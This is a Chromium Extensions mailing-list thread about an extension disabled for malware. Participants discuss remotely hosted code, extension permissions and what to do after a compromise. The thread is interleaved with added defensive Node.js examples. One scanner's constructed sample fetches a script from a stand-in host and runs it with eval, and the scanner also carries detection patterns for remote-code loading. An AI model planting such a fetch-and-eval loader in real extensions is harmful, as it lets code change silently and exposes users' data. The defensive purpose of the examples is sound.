extension malware: reader view plus has been disabled because it contains malware


dan

Aug 25, 2021, 7:05:22 PM
to Chromium Extensions
hi everyone, simeon asked me to post in here about this extension issue:

last week chrome (mac) gave me a notification saying "this extension may be dangerous" - "reader view plus has been disabled because it contains malware". there was no additional information provided by google as to what kind of malware it was, or what it was doing. 

i have been using this extension for over a year, probably longer, and after getting that notification i was in shock. when i went to search for this extension on the chrome web store, i see that it was removed (only a 404 page left). i googled it and got a cached version of the page, which shows that over 500,000+ people were using it. the cached page shows it was offered by Rebecca Herzog. i think the extension's id was gjhmajellcaeediogokhjjgffojhcnkb but am not 100% sure.

my question is, does google know exactly what kind of malware this extension had, and what it was doing? what behaviour was determined to be malware? this extension had full site access on all sites in its settings. i am terrified as to what kind of data it could have collected on me and my computer/browsing.

can someone from google please let me know why this was flagged, removed and disabled in chrome, and what data it was collecting, and what the malware was doing?

do i have to change every single one of my passwords on every site i have ever used? do i have to get new credit cards? right now i am thinking worst case scenario where i have to assume everything has been compromised.

any information provided would be greatly appreciated. i can't even tell you how violated this makes you feel, and the thought of this app having collected all my username/passwords, credit cards, and other info is absolutely terrifying. i have not been able to sleep because of this, and i know that there are 500,000+ other people who were using this extension.

thank you!

Vishnu NUK

Aug 25, 2021, 10:10:56 PM
to Chromium Extensions, dan, sim...@chromium.org
Maybe someone at CWS team found a new definition for malware like they did for spam redirect last week.
Otherwise they did something really really wrong using remote code execution. 
instead of showing "404. That’s an error." show something useful like " Extension removed for this or that reason " 

Cuyler Stuwe

Aug 28, 2021, 7:28:02 PM
to Vishnu NUK, Chromium Extensions, dan, sim...@chromium.org
If I were you, I would behave as though all of your username/password combos were compromised.

Even if someone from Google were to tell you which breaches of information they found, would you really have full faith that they found them all? I certainly wouldn't. It would be silly to think that a particular type of data is inherently safe simply because you weren't specifically told that it was compromised.

For any site that requires hardware 2FA (e.g., a YubiKey, etc.), you should generally be safe; the whole idea of 2FA is that a correct username/password combo isn't sufficient alone to compromise your account. If you haven't moved toward this type of security precaution, you probably should.

You should probably behave as though any of your credit cards you used online were also compromised. If you can't remember which ones were used online and which were not, the safest thing would be to replace all of them. With that said, credit card companies generally accept liability for fraudulent transactions (debit cards, OTOH, do not). As a consequence of this liability protection they offer, they generally tend to prevent suspicious transactions (e.g., someone on the other side of the state trying to process an order) and lock up cards that show repeated suspicious activity. Therefore, start with replacing debit cards.

Site hacks and other security breaches are becoming so common that your approach to security should definitely presume that someone out there already has some of your sensitive information anyway. You should never assume that someone doesn't have any of it.

In all reality, what probably happened is that a safe extension was sold to a malicious user. Google is somewhat culpable for this kind of outcome; they've made it fairly difficult to monetize browser extensions ("single-purpose policy" effectively bans advertising, and they just removed the CWS payments API). Many decent extension developers receive good offers to sell high-user-count extensions, and they see this as a way to exit profitably from browser extension development. They rarely consider that perhaps their extension will be used maliciously. Developers' accounts are sometimes hacked, as well (hence Google's new 2FA requirement), and updated by hackers to run malicious code. So, while you should behave as though the code was malicious the entire time, it probably was malicious for only a short while before it was disabled.

--
You received this message because you are subscribed to the Google Groups "Chromium Extensions" group.
To unsubscribe from this group and stop receiving emails from it, send an email to chromium-extens...@chromium.org.
To view this discussion on the web visit https://groups.google.com/a/chromium.org/d/msgid/chromium-extensions/2e5fa567-916d-4b1c-8c0f-44c3e58cb249n%40chromium.org.

Vishnu NUK

Aug 30, 2021, 12:14:32 AM
to Chromium Extensions, salem...@gmail.com, Chromium Extensions, dan, Simeon Vincent, Vishnu NUK
Personally, I got more than 100+ emails asking to sell my little extension with just 60K users and offered several thousand USD. So it is true that developers can sell the extension, and the company or people who bought it can do whatever they need with it.
In general, use only a few extensions you really need and make sure it is a popular open-source project or developed by a top-rated company with a legally registered business identity. 

dan

Aug 30, 2021, 3:04:08 PM
to Chromium Extensions, salem...@gmail.com, Chromium Extensions, dan, Simeon Vincent, narayanann...@gmail.com
hi, thank you for the reply.

i am waiting to hear from Simeon as he asked me to make a post here about this issue. i would like to know why google remotely disabled this extension, and marked it as malware. they must know what it was doing that made them decide to terminate the extension.

i guess i have no choice but to change all passwords, which will take weeks to do.

you said "while you should behave as though the code was malicious the entire time, it probably was malicious for only a short while before it was disabled" -- the odd thing is that this extension was last updated October 27, 2020 (v 0.3.8). that was the version installed on my computer, and looking at the google search cached page for this extension on the Chrome Web Store, it shows this was the last version available.

so it hasn't been updated in almost a year. 500,000+ people had downloaded this extension... so i would assume that whatever malware was in this extension was there since at least last October 2020 if the extension hasn't been updated since then.

so more questions. hopefully Simeon can let me know exactly what happened. this is literally my worst nightmare.

Cuyler Stuwe

Aug 30, 2021, 3:08:31 PM
to dan, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
Where are you getting this information about when it was last updated on the CWS? The cached page? That’s likely out-of-date.

Alexei Miagkov

Aug 30, 2021, 4:09:26 PM
to Cuyler Stuwe, dan, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com

Cuyler Stuwe

Aug 30, 2021, 6:22:12 PM
to Chromium Extensions, Alex, dan, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com, Cuyler Stuwe
What makes you so certain that website grabbed information from the latest update before it was pulled from the store?

Simeon Vincent

Aug 30, 2021, 9:37:12 PM
to Cuyler Stuwe, Chromium Extensions, Alex, dan, narayanann...@gmail.com
Hey Dan,

> last week chrome (mac) gave me a notification saying "this extension may be dangerous" - "reader view plus has been disabled because it contains malware". there was no additional information provided by google as to what kind of malware it was, or what it was doing.

What you've described here matches my understanding of the Chrome Web Store's current enforcement practice for malware. To my knowledge we do not share information related to malware verdicts with the developer, the public, or any other 3rd parties. Unfortunately, this means we cannot provide the information you're after.

While I do not know the specific details of this case, generally speaking the most common way that extensions exploit users and evade our detection is through the use of "remotely hosted code", or code that is retrieved and executed after the extension has been installed. If the extension used remotely hosted code, the authors could change its behavior whenever they wanted. And because of the nature of remotely hosted code, it's possible that a version of an extension published months or years ago only recently began exploiting users.

To be clear, not all uses of remotely hosted code are malicious. A good number of trustworthy extensions use this capability to quickly react when a website they integrate with updates, quickly iterate on features, run A/B tests, and for other legitimate reasons. Ultimately, though, we're disallowing the use of remotely hosted code in Manifest V3 because we feel that the risks outweigh the benefits.

In the interest of ensuring your own safety, I'd recommend following Cuyler's suggestion to "behave as though all of your username/password combos were compromised."

Simeon - @dotproto
Chrome Extensions DevRel
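As an added example, not code from this thread or from any extension it mentions: a small Node.js scanner for the "remotely hosted code" indicators Simeon describes, run over constructed sample files. It flags an MV2 manifest whose content security policy admits a remote script origin, and scripts that download text and hand it to eval, which is the pattern that lets behaviour change after install without a new store version. The indicator names, both sample manifests and the hostname cdn.example.invalid are assumptions made for this example.

```javascript
// Added example, not from the thread: static indicators of remotely hosted code
// in an unpacked extension (manifest.json plus its scripts). Every file here is
// a constructed sample; nothing is taken from the real extension under discussion.

// Script-level indicators: each has a regex and the reason a reviewer flags it.
const SCRIPT_INDICATORS = [
  { name: 'eval', re: /\beval\s*\(/, why: 'executes a string as code' },
  { name: 'new-function', re: /\bnew\s+Function\s*\(/, why: 'builds a function body from a string' },
  { name: 'import-scripts-remote', re: /\bimportScripts\s*\(\s*['"`]https?:/i, why: 'worker loads a remote script' },
  { name: 'remote-src-assignment', re: /\.src\s*=\s*['"`]https?:/i, why: 'assigns a remote URL to an element src (review manually)' },
  {
    name: 'fetch-then-execute',
    re: /fetch\s*\([^)]*\)[\s\S]{0,200}?\b(eval|new\s+Function)\s*\(/,
    why: 'downloaded text is executed',
  },
];

function scanScript(path, source) {
  const hits = [];
  for (const ind of SCRIPT_INDICATORS) {
    if (ind.re.test(source)) hits.push({ file: path, indicator: ind.name, why: ind.why });
  }
  return hits;
}

// MV2 stores the CSP as a string; MV3 uses an object with an extension_pages key.
function cspString(manifest) {
  const csp = manifest.content_security_policy;
  if (typeof csp === 'string') return csp;
  if (csp && typeof csp.extension_pages === 'string') return csp.extension_pages;
  return '';
}

function scanManifest(manifest) {
  const hits = [];
  const csp = cspString(manifest);
  // A script-src directive naming an http(s) origin: MV2 allowed this, MV3 rejects it.
  if (/script-src[^;]*https?:\/\//i.test(csp)) {
    hits.push({ file: 'manifest.json', indicator: 'csp-remote-script-src', why: 'CSP allows loading scripts from a remote origin' });
  }
  if (/'unsafe-eval'/.test(csp)) {
    hits.push({ file: 'manifest.json', indicator: 'csp-unsafe-eval', why: 'CSP allows eval in extension pages' });
  }
  return hits;
}

// files: map of relative path -> file contents, as read from an unpacked extension.
function scanExtension(files) {
  const manifest = JSON.parse(files['manifest.json']);
  let hits = scanManifest(manifest);
  for (const [path, source] of Object.entries(files)) {
    if (path.endsWith('.js')) hits = hits.concat(scanScript(path, source));
  }
  return { manifestVersion: manifest.manifest_version, hits };
}

// Constructed sample: an MV2 extension whose background script pulls code at runtime.
const SAMPLE_SUSPICIOUS = {
  'manifest.json': JSON.stringify({
    manifest_version: 2,
    name: 'Sample reader (constructed)',
    version: '0.0.1',
    content_security_policy: "script-src 'self' https://cdn.example.invalid; object-src 'self'",
    background: { scripts: ['background.js'] },
  }),
  'background.js': [
    "fetch('https://cdn.example.invalid/config.js')",
    '  .then(r => r.text())',
    '  .then(code => eval(code));',
  ].join('\n'),
};

// Constructed sample: an MV3 extension with no such indicators.
const SAMPLE_CLEAN = {
  'manifest.json': JSON.stringify({
    manifest_version: 3,
    name: 'Sample reader (constructed)',
    version: '0.0.2',
    background: { service_worker: 'background.js' },
  }),
  'background.js': "chrome.runtime.onInstalled.addListener(() => console.log('installed'));",
};

console.log(JSON.stringify(scanExtension(SAMPLE_SUSPICIOUS), null, 2));
```

A hit is a reason to read the code, not a verdict: as Simeon notes, legitimate extensions also fetched remote code under MV2. The point of the scan is that an extension with these indicators can change what it does without the store or the user seeing a new version, which is why the "last updated" date on a cached listing says little about when the behaviour changed.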

dan

Aug 31, 2021, 3:40:21 PM
to Chromium Extensions, Simeon Vincent, Chromium Extensions, Alex, dan, narayanann...@gmail.com, salem...@gmail.com
hi simeon, is it possible to find out if the version that i was using 0.3.8 was the one that contained malware, or if a newer version was released and that was the one that was flagged? i had 0.3.8 installed for almost a year. the cached page i saw was showing 0.3.8, but i am wondering if a newer version was released then flagged. is it possible to tell me this or refer me to someone who knows the specific details of this case? 

so basically you are saying that it could have been remotely hosted code that wasn't malicious, but we can't tell you that?

i will have to take a month off work to change 500+ usernames/passwords. this has the potential to totally destroy my life. i am begging you to help me find out a little more information.

so since extensions are sandboxed, worst case scenario it was able to get my username/passwords, any information entered into web forms, browsing history, and cookies. but from my understanding cannot see information in other extensions or access the computer's shell/filesystem, or anything outside of chrome?

thank you.

Cuyler Stuwe

Aug 31, 2021, 4:26:45 PM
to dan, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
It wouldn’t have been able to see your browsing history unless you explicitly approved the installation of a version that had “history” permissions (you would have accepted the respective prompt).

It may have been able to grab some cookies, but it would have needed the “cookies” permission to grab all types of them. There are HTTP-only cookies that are normally invisible to JavaScript running in the context of a page.

I can’t imagine that replacing 500 passwords would demand a whole month away from work, or that it’s “life-ruining”; that seems like an extreme melodramatic exaggeration. As long as you know which sites you need to replace the passwords for, it likely will take between 1-2 very tedious days, at most. Those 1-2 days will suck; I recommend queuing up a playlist of your favorite music to make it more palatable.

To avoid ever having to go through this tedium again, and to bolster your security, I recommend signing up for sites with Google/Facebook/etc. (or other SSO/SAML providers) wherever possible, and then protecting those sign-ins with hardware 2FA (again, YubiKey is a popular choice). This will reduce the number of accounts you need to manage, and will drastically limit the impact of a breach.

Just as with Apple and Microsoft, Google cannot find all malware automatically (if they could, there would be no need for anti-malware companies). Whenever you install an extension with wide-ranging permissions, you implicitly accept the risk inherent to these permissions; that’s why you’re warned of the risks. It’s possible that you may have other malware extensions installed right now whose malicious activity has gone undetected. For extensions that have such powerful capabilities, you should feel certain of who the developer is and that you can trust them.

I hope you resolve this issue as soon and as painlessly as possible, and I hope that it becomes a learning experience that helps you harden your security posture moving forward.
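As an added example, not from the thread: a Node.js snippet that parses a site's Set-Cookie headers the way a reviewer would to see which cookies a script running in the page (an extension's content script included) could read through document.cookie, and which are marked HttpOnly and therefore stay out of reach unless the extension also holds the separate "cookies" permission Cuyler mentions. The Set-Cookie lines are constructed samples.

```javascript
// Added example, not from the thread. Splits a site's Set-Cookie headers into
// cookies a page-level script can read via document.cookie and cookies marked
// HttpOnly, which the browser never exposes to script in the page.
// The sample headers are constructed for this example.

function parseSetCookie(line) {
  const [pair, ...attrs] = line.split(';').map(s => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq >= 0 ? pair.slice(0, eq) : pair,
    value: eq >= 0 ? pair.slice(eq + 1) : '',
    httpOnly: false,
    secure: false,
    sameSite: 'none-specified',
  };
  for (const attr of attrs) {
    const [key, val] = attr.split('=');
    switch (key.toLowerCase()) {
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure': cookie.secure = true; break;
      case 'samesite': cookie.sameSite = (val || '').toLowerCase(); break;
      default: break; // Path, Domain, Expires, Max-Age do not change script visibility
    }
  }
  return cookie;
}

// Which cookie names a content script on the page could read directly, and which
// would additionally require the "cookies" extension permission (chrome.cookies).
function classifyCookies(setCookieLines) {
  const cookies = setCookieLines.map(parseSetCookie);
  return {
    readableViaDocumentCookie: cookies.filter(c => !c.httpOnly).map(c => c.name),
    needsCookiesPermission: cookies.filter(c => c.httpOnly).map(c => c.name),
  };
}

// Constructed sample: a typical login response's Set-Cookie headers.
const SAMPLE_SET_COOKIE = [
  'sessionid=a1b2c3d4e5f6; Path=/; Secure; HttpOnly; SameSite=Lax',
  'theme=dark; Path=/; Max-Age=31536000',
  'csrftoken=0f9e8d7c6b5a; Path=/; Secure; SameSite=Strict',
];

console.log(classifyCookies(SAMPLE_SET_COOKIE));
```

HttpOnly protects the session cookie from page-level script, but it does not protect what the user types into the page: a content script with site access on that origin still sees the password field as it is filled, which is why the thread's advice to rotate passwords stands regardless of cookie flags.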

dan

Aug 31, 2021, 10:51:46 PM
to Chromium Extensions, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com, dan
hi Cuyler, thank you so much for your reply, i really appreciate the advice and help.

for this malware extension, the extension's permissions only consisted of "site access", which was set to "allow this extension to read and change all your data on websites you visit" set to "on all sites". there were no other permission settings for this extension. i took a screen shot before removing it. allow in incognito and allow access to file URLs was turned off.

changing passwords i can deal with, but the most important question i have is: would it be possible for this extension to have seen what was on my MacOS clipboard, any text that i had copied to it, and have gotten that? or if i copied a file in MacOS, then pasted it/or didn't paste it, would this extension have been able to get that file? right now that is my most important concern. do you know the answer to that question?

there was no "history" or "cookies" setting in permissions. i read that extensions are in a sandbox, so my question is, based on the settings i had, would this extension have been able to:

1] access my username/passwords for any website that i logged into? either typing the username/password in manually OR chrome autofilling the username/password, which has the password *** censored. could it see the censored version from autofill? or when you go into settings in chrome and view your passwords?
2] access any information that i would have typed into forms or anywhere else in the web browser (address bar/url entry).
3] see what sites i visited: my history or the current site i am on
4] access cookies (i'm not sure what http only cookies are?). as i said there was no cookies setting in permissions.
5] access the shell or filesystem on MacOS or access any data outside of the chrome application.
6] access any data in other chrome extensions.
7] access what was on the MacOS clipboard (text or a file) and see that data and get it.

currently the extensions i am using are AdBlock, disable HTML5 autoplay, DuckDuckGo Privacy Essentials, Ghostery, GoFullPage screen capture, Google Docs Offline, Google Mail Checker, MetaMask, Privacy Badger, and uBlock Origin. do you have any suggestions about which would be unsafe?

now i'm wondering if that malware extension would have been able to see into MetaMask, as when you put in your seed phrase after installation it opens a browser window called chrome-extension://...home.html#restorevault, where you enter your recovery phrase and create a password for the extension. do you have any idea about this?

once again, i sincerely thank you for your time and help. almost every issue i can deal with, but if it had access to my MacOS clipboard and any text on it, or files i was copying/pasting in the filesystem, that would just be a disaster.

hrg...@gmail.com

Aug 31, 2021, 11:10:18 PM
to Chromium Extensions, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
The permission "allow this extension to read and change all your data on websites you visit" is the <all_urls> permission, which allows an extension to see everything you type on every page you visit, with the exception of protected URLs (chrome://, chrome-extension://, the CWS, and a few others).

It's no exaggeration that the permission is shown to the users with the phrase "read and change ALL your data".

Vishnu NUK

Sep 1, 2021, 12:30:32 PM
to Chromium Extensions, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, Vishnu NUK
Try uBlock Origin. uBlock Origin is not an "ad blocker", it's a wide-spectrum content blocker with CPU and memory efficiency as a primary feature.

dan

Sep 1, 2021, 3:21:09 PM
to Chromium Extensions, narayanann...@gmail.com, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent
hello, i have been using uBlock Origin for years.

my main concern right now is if the malware extension i had was able to view my clipboard and access the data on it [text/files]. does anyone know the answer to this?

dan

Sep 3, 2021, 2:43:05 PM
to Chromium Extensions, hrg...@gmail.com, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
hi Cuyler/Simeon or anyone else that knows: would it be possible for a chrome extension (and specifically the one i had that was flagged as malware) to access the shell or filesystem of a Mac, or see/access what is on the MacOS clipboard [text or files that i have copied] and get that data? or access information in another extension?

Cuyler, in your original message you said that "it probably was malicious for only a short while before it was disabled." ... can you give an estimate of how short a time you think that would be? 1 day? 1 week? 2 weeks?

i am trying to see what the worst case scenario is besides getting username/passwords. if anyone knows the answer to these questions i would really appreciate it. i read that extensions are in a sandbox, but don't know exactly what that means.

thank you.

Cuyler Stuwe

Sep 3, 2021, 2:45:12 PM
to dan, Alex, Chromium Extensions, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com
With the permissions it seems to have had, it wouldn’t have been able to arbitrarily access your filesystem without outside assistance.

Similar with clipboard.

dan

Sep 4, 2021, 8:03:51 PM
to Chromium Extensions, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com, dan
thank you for the reply. what does outside assistance mean?

i actually had the extension turned off for a week or two before it was flagged as malware as well.... so i think i am ok, but will change all passwords just to be safe.

i just wish i knew how long it was malicious before being remotely disabled, you said probably for a short while of time. i guess you don't know how long that could possibly be, days or a week or two? how fast can google find out extensions have malware in them?

thank you again for the help, it really means a lot to me.

Cuyler Stuwe

Sep 4, 2021, 8:20:43 PM
to dan, Chromium Extensions, Alex, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com
By "outside assistance", I mean just that -- other people and/or software.

One conceivable example might be insecure software running locally that exposes localhost connections for configuration.

For example, the software for one of my mice runs a localhost server for programmatic control of its lights and vibration features. If you suppose that this software was written carelessly (so that it could accidentally affect the local filesystem somehow), anything that could communicate with it (e.g., an extension) could exploit this vulnerability.

Another example: Let's just suppose that there's a bug in Chrome causing an unintended vulnerability (wouldn't be even close to the first time).

In other words, it's an unlikely scenario, but plausible.

dan

Sep 5, 2021, 7:34:33 PM
to Chromium Extensions, salem...@gmail.com, Chromium Extensions, Alex, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com, dan
thank you for the info. you said it was probably only malicious for a short time -- i guess you don't know how long that could possibly be, days or a week or two? how fast can google find out extensions have malware in them?

dan

Sep 7, 2021, 9:27:55 PM
to Chromium Extensions, dan, salem...@gmail.com, Chromium Extensions, Alex, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com
hey Cuyler/everyone: one thing i just noticed is that when Chrome remotely disables an extension, i believe it removes all permissions from the listed permissions -- i have a screenshot of the malware extension that was disabled, but under permissions it's blank, there is nothing there and it doesn't say "no permissions" or anything, just completely blank, and no room for anything to even be listed as there is a line under the word permissions, then 'site access' listed under that line.

i would assume that when i installed this 'reader view plus' extension i didn't grant it any special filesystem or clipboard permissions. 

most extensions that have "allow this extension to read and change all your data on websites you visit" set to "all sites" that i have installed just have "allow this extension to read your browsing history" under permissions and nothing else.

i guess i will never know what permissions it had enabled, or what data it collected. i really just wish i knew how long it was malicious for. 

Simeon Vincent

Sep 9, 2022, 3:04:47 PM
to MASAHIKO HOSI, acc...@visatmonlie.com, Chromium Extensions, dan, salem...@gmail.com, Alex, narayanann...@gmail.com
> It wouldn’t have been able to see your browsing history unless you explicitly approved the installation of a version that had “history” permissions (you would have accepted the respective prompt).

FYI, the "tabs" permission also displays a warning message that says the extension can "Read your browsing history". An extension that requests the tabs permission can use the tabs.onUpdated event to collect the tab URL of every page the user visits and therefore over time can collect the user's browsing history.

> now i'm wondering if that malware extension would have been able to see into MetaMask, as when you put in your seed phrase after installation it opens a browser window called chrome-extension://...home.html#restorevault, where you enter your recovery phrase and create a password for the extension. do you have any idea about this?
 
Extensions are not able to directly interact with the contents of another extension's page. For example, while extensions can inject scripts onto a site like example.com, they cannot inject scripts into a page opened to chrome-extension://EXTENSION_ID/index.html. I can't think of a way that the offending extension would have been able to get the recovery phrase or password you mentioned.

> thank you for the info. you said it was probably only malicious for a short time -- i guess you don't know how long that could possibly be, days or a week or two? how fast can google find out extensions have malware in them?

The short answer is "it depends." In some cases we take action against extensions before they're ever listed in the store. In others, internal investigations or external reports surface the fact that an item publicly listed in the store is doing something nefarious. Depending on how the extension is built, it may be impossible to determine how long the extension has been exploiting users because the extension itself doesn't contain that code.

Even if the malicious code is baked into the extension, it may not be possible for you to determine how long the offending code has been in the extension because the Chrome Web Store basically only knows about two versions of an extension: the currently published version and a draft that has yet to be submitted, and the draft is not publicly accessible.  

As Cuyler said, in many cases what happens is "a safe extension was sold to a malicious user". Then, after the sale the new owner adds code to the extension to collect the user's browsing history (high value, low hanging fruit) without their knowledge, without disclosing this behavior, and in violation of Chrome Web Store policy. Once we hear about it we investigate and take corrective action. Unfortunately I can't share (and therefore avoid learning in the first place) detailed information about the internals of the review process. As a result, I have no idea how much time passes on average between the new code addition and corrective action.

Simeon - @dotproto
Chrome Extensions DevRel
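As an added example covering both hrg's explanation of the <all_urls> grant and Simeon's note on the "tabs" permission, not code from the thread: a Node.js audit that reads an extension manifest the way the install prompt does, separating host patterns (which sites a content script can read and change) from API permissions (what else it can reach), and a check of which URLs an <all_urls> content script actually runs on once the protected pages the thread lists are carved out. The two manifests are constructed samples, the risk descriptions are this example's own summaries rather than Chrome's exact prompt text, and the Chrome Web Store URL is the chrome.google.com/webstore address in use in 2021.

```javascript
// Added example, not from the thread. Reads an extension manifest the way the
// Chrome Web Store install prompt does: host patterns decide which sites a content
// script can read and change, API permissions decide what else it can reach.
// The two manifests at the bottom are constructed samples, not the real extension's.

// Summaries for API permissions whose prompt reveals browsing data. The "tabs"
// entry follows Simeon's note; the other wording is this example's own, not Chrome's.
const API_PERMISSION_RISKS = {
  tabs: 'Read your browsing history (tab URLs via chrome.tabs.onUpdated)',
  history: 'Read and change your browsing history',
  cookies: 'Read cookies, HttpOnly ones included, on permitted hosts',
  webRequest: 'Observe requests the browser makes to permitted hosts',
  clipboardRead: 'Read data you copy and paste',
  nativeMessaging: 'Exchange messages with a native program registered on the machine',
};

// Host patterns that amount to "all your data on websites you visit".
const BROAD_HOST_PATTERNS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

function hostPatterns(manifest) {
  const fromPermissions = (manifest.permissions || []).filter(p => p === '<all_urls>' || p.includes('://'));
  const fromHostPermissions = manifest.host_permissions || []; // MV3 lists hosts here
  const fromContentScripts = (manifest.content_scripts || []).flatMap(cs => cs.matches || []);
  return [...new Set([...fromPermissions, ...fromHostPermissions, ...fromContentScripts])];
}

function auditManifest(manifest) {
  const hosts = hostPatterns(manifest);
  const readsAllSites = hosts.some(h => BROAD_HOST_PATTERNS.has(h));
  const apiRisks = (manifest.permissions || [])
    .filter(p => Object.prototype.hasOwnProperty.call(API_PERMISSION_RISKS, p))
    .map(p => ({ permission: p, exposes: API_PERMISSION_RISKS[p] }));
  // With site access alone (no "tabs"/"history"), a content script still sees the
  // URL of each page it runs on and everything typed into that page.
  const pageLevelExposure = readsAllSites
    ? ['text typed into forms, passwords included', 'page contents',
       'URL of each page it runs on', 'document.cookie (non-HttpOnly cookies)']
    : [];
  return { readsAllSites, hostPatterns: hosts, apiRisks, pageLevelExposure };
}

// Pages a content script never reaches even under <all_urls>: the thread names
// chrome://, chrome-extension:// and the Chrome Web Store (chrome.google.com/webstore
// in 2021). file: URLs need the separate "Allow access to file URLs" toggle, which
// the poster reported was off.
function reachableByContentScript(url, { fileAccess = false } = {}) {
  const u = new URL(url);
  if (u.protocol === 'chrome:' || u.protocol === 'chrome-extension:') return false;
  if (u.hostname === 'chrome.google.com' && u.pathname.startsWith('/webstore')) return false;
  if (u.protocol === 'file:') return fileAccess;
  return u.protocol === 'http:' || u.protocol === 'https:';
}

// Constructed sample 1: only "site access" on all sites, as the poster described.
const SAMPLE_SITE_ACCESS_ONLY = {
  manifest_version: 2,
  name: 'Sample reader (constructed)',
  version: '0.0.1',
  permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
};

// Constructed sample 2: adds "tabs" and "cookies", which the prompt warns about.
const SAMPLE_WITH_TABS = {
  manifest_version: 2,
  name: 'Sample reader (constructed)',
  version: '0.0.2',
  permissions: ['tabs', 'cookies', 'https://*/*'],
};

console.log(JSON.stringify(auditManifest(SAMPLE_SITE_ACCESS_ONLY), null, 2));
console.log(JSON.stringify(auditManifest(SAMPLE_WITH_TABS), null, 2));
```

The audit makes the thread's two answers concrete: the site-access-only sample has no API risks, yet it already exposes everything typed into every ordinary web page, while the MetaMask restore page (a chrome-extension:// URL) and Chrome's own settings pages come back as unreachable.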


On Wed, Aug 31, 2022 at 9:51 AM MASAHIKO HOSI <zhengya...@gmail.com> wrote:


On Wed, Sep 1, 2021 at 12:10 hrg...@gmail.com <hrg...@gmail.com> wrote: